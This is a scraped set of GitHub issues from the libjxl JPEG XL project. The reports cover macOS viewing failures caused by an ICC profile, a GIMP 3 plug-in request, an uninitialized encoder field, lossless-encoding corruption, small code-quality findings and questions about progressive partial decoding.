| Behaviour of `-j` flags in encoder/decoder is confusing | https://api.github.com/repos/libjxl/libjxl/issues/4078/comments | 0 | 2025-01-21T23:48:11Z | 2025-01-21T23:48:11Z | https://github.com/libjxl/libjxl/issues/4078 | 2,803,046,007 | 4,078 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
A JPEG file that Safari, Preview and Quickview can display produces, when transcoded to JXL via `cjxl 19617.jpeg 19617.jxl`, an image those apps cannot display. Converting it back to JPEG via `djxl 19617.jxl 19617_dj.jpeg` produces a JPEG that is once again viewable in those apps.
Discord user jonnyawsom3 determined that this specific JPEG has an ICC Profile named `c2ci` and that removing the profile allowed the cjxl image to be displayed on Mac. He [linked](https://photosauce.net/blog/post/making-a-minimal-srgb-icc-profile-part-1-trim-the-fat-abuse-the-spec) to a document discussing the profile.
**To Reproduce**
Download the attached 19617.jpeg file and convert it to JXL, `cjxl 19617.jpeg 19617.jxl` and view both on a Mac. Convert the JXL back to JPEG with `djxl 19617.jxl 19617_dj.jpeg` and the image will be viewable.
**Expected behavior**
The `cjxl` generated JXL should be as viewable as the JPEG on Mac.
**Screenshots**
**Environment**
- OS: MacOS 15.2
- Compiler version: Unsure ( current installed version is: Apple clang version 16.0.0 (clang-1600.0.26.6) ) but I don't know if that was the version it was built with
- CPU type: arm64
- cjxl/djxl version string: JPEG XL encoder v0.11.1 0.11.1 [NEON]
**Additional context**

| Transcoding a JPEG which is viewable with MacOS, produces an unviewable JXL file | https://api.github.com/repos/libjxl/libjxl/issues/4056/comments | 1 | 2025-01-09T22:43:58Z | 2025-01-29T20:15:33Z | https://github.com/libjxl/libjxl/issues/4056 | 2,778,889,624 | 4,056 |
[
"libjxl",
"libjxl"
] | Supporting both the 2.10+ and the 3.0 API in the same sources is likely not worth it.
Perhaps we could extract some common logic, though.
Currently `debian:sid` has updated GIMP to 3.0; perhaps `debian:trixie` will be the next. | Implement GIMP-3 compatible plug-in | https://api.github.com/repos/libjxl/libjxl/issues/4037/comments | 0 | 2024-12-31T10:03:26Z | 2024-12-31T10:03:38Z | https://github.com/libjxl/libjxl/issues/4037 | 2,764,193,256 | 4,037 |
[
"libjxl",
"libjxl"
] | I have an impression that the use here of the default `-1` value converted to `true`
https://github.com/libjxl/libjxl/blob/24e12baf0e8e697fdde84a5250b2df32f18cf40b/lib/jxl/enc_modular.cc#L476
is unintended, as the value is initialized just a few lines lower:
https://github.com/libjxl/libjxl/blob/24e12baf0e8e697fdde84a5250b2df32f18cf40b/lib/jxl/enc_modular.cc#L488-L494
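A minimal model of the problem (Python standing in for the C++ int-to-bool conversion; this is not the libjxl code itself):

```python
# 'responsive' defaults to -1, meaning "unset", but a truthiness check that
# runs before the initialization treats -1 exactly like "enabled" (-R 1).
responsive = -1        # default: user passed neither -R 0 nor -R 1
if responsive:         # bool(-1) is True, like (bool)-1 == true in C++
    chose_responsive = True
else:
    chose_responsive = False
assert chose_responsive  # silently behaves as if -R 1 had been given
```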
This leads to the paradoxical result that files encoded losslessly with and without `-R 0` are different. I think the initialization should be moved before this first use of the `responsive` field. | Use of unintialized `responsive` field | https://api.github.com/repos/libjxl/libjxl/issues/4028/comments | 0 | 2024-12-23T09:45:45Z | 2024-12-23T09:45:45Z | https://github.com/libjxl/libjxl/issues/4028 | 2,755,642,088 | 4,028 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
Lossless encoding using `-d 0 -e 1` sometimes generates artifacts and sometimes generates a completely corrupted file.
**To Reproduce**
Download and extract the ZIP below and encode the PNG files using `cjxl -d 0 -e 1`: `glitched_image.png` will encode but will have an odd artifact, and `corrupted_image.png` will encode into a completely corrupted image. Encodes made with `JPEG XL encoder v0.12.0 24e12baf [NEON,NEON_WITHOUT_AES]` are given in the ZIP.
**Expected behavior**
The images are converted losslessly
**Screenshots**
[Archive.zip](https://github.com/user-attachments/files/18223978/Archive.zip)
**Environment**
- OS: [e.g. Windows] `OrbStack Ubuntu VM on MacOS`
- Compiler version: [e.g. clang 11.0.1] `clang version 19.1.1 (1ubuntu1)`
- CPU type: [e.g. x86_64] `aarch64`
- cjxl/djxl version string: [e.g. cjxl [v0.3.7 | SIMD supported: SSE4,Scalar]] `JPEG XL encoder v0.12.0 24e12baf [NEON,NEON_WITHOUT_AES]` | Lossless images are not actually lossless | https://api.github.com/repos/libjxl/libjxl/issues/4026/comments | 2 | 2024-12-23T01:14:14Z | 2024-12-23T09:31:55Z | https://github.com/libjxl/libjxl/issues/4026 | 2,755,005,068 | 4,026 |
[
"libjxl",
"libjxl"
] | File:
libjxl-main/tools/jxlinfo.c line 197
Code:
if (extra.dim_shift > 0) {
printf(" dim_shift: %u (upsampled %ux)\n", extra.dim_shift, 1 << extra.dim_shift); // <-- %u vs extra.dim_shift
} | check format string | https://api.github.com/repos/libjxl/libjxl/issues/4019/comments | 0 | 2024-12-18T12:14:59Z | 2024-12-18T12:14:59Z | https://github.com/libjxl/libjxl/issues/4019 | 2,747,654,853 | 4,019 |
[
"libjxl",
"libjxl"
] | File:
libjxl-main/tools/benchmark/benchmark_stats.cc line 307
Code:
} else if (descriptors[i].type == TYPE_POSITIVE_FLOAT) {
value = FormatFloat(descriptors[i], values[i].f);
value = FormatFloat(descriptors[i], values[i].f); // <-- identical
} else if (descriptors[i].type == TYPE_COUNT) { | identical line | https://api.github.com/repos/libjxl/libjxl/issues/3999/comments | 2 | 2024-12-09T10:51:57Z | 2024-12-10T13:02:48Z | https://github.com/libjxl/libjxl/issues/3999 | 2,726,681,838 | 3,999 |
[
"libjxl",
"libjxl"
] | File:
libjxl-main/lib/extras/enc/jpegli.cc line 390:
Code:
// before the call to setjmp().
std::vector<uint8_t> pixels; // <-- unused
unsigned char* output_buffer = nullptr;
| unused variable | https://api.github.com/repos/libjxl/libjxl/issues/3998/comments | 3 | 2024-12-09T10:50:00Z | 2025-01-21T08:11:52Z | https://github.com/libjxl/libjxl/issues/3998 | 2,726,677,569 | 3,998 |
[
"libjxl",
"libjxl"
] | **Describe the bug**
I want to use 1% of the data to decode and display a rough image normally.
The cjxl command I used was:
cjxl --progressive_dc=1 --lossless_jpeg=0 --quality=40 --brotli_effort=10 --group_order=1 --compress_boxes=0 --codestream_level=-1 --allow_jpeg_reconstruction=0 -e 7 2.jpg output.jxl
**To Reproduce**
Steps to reproduce the behavior:
I cut the pixel data into chunks of about 500 bytes per list element, about 120 packets in total. I called the API to decode, and it took about 80 packets before a rough image was displayed; all the earlier packets only returned JXL_DEC_NEED_MORE_INPUT and JXL_DEC_ERROR. Doesn't JPEG XL officially support displaying a rough image from 1% of the data? Why can I only display the image after loading about 70% of the data? How can I solve this?
**Expected behavior**
1% of the data to decode and display a rough image normally
**Environment**
- OS: [Mac]
- CPU type: [e.g. x86_64]
- cjxl/djxl version string: [ cjxl 0.11.0]
| use 1% of the data to decode and display a rough image normally | https://api.github.com/repos/libjxl/libjxl/issues/3991/comments | 2 | 2024-12-04T06:41:27Z | 2025-03-09T03:12:07Z | https://github.com/libjxl/libjxl/issues/3991 | 2,716,702,019 | 3,991 |
[
"libjxl",
"libjxl"
] | If I use the API, how can I use 1% of the data to decode and display a rough image normally? If the API cannot be used, how can I implement the decoding required by myself? | use 1% of the data to decode and display a rough image normally | https://api.github.com/repos/libjxl/libjxl/issues/3989/comments | 4 | 2024-12-03T02:41:19Z | 2025-04-27T02:48:04Z | https://github.com/libjxl/libjxl/issues/3989 | 2,713,842,274 | 3,989 |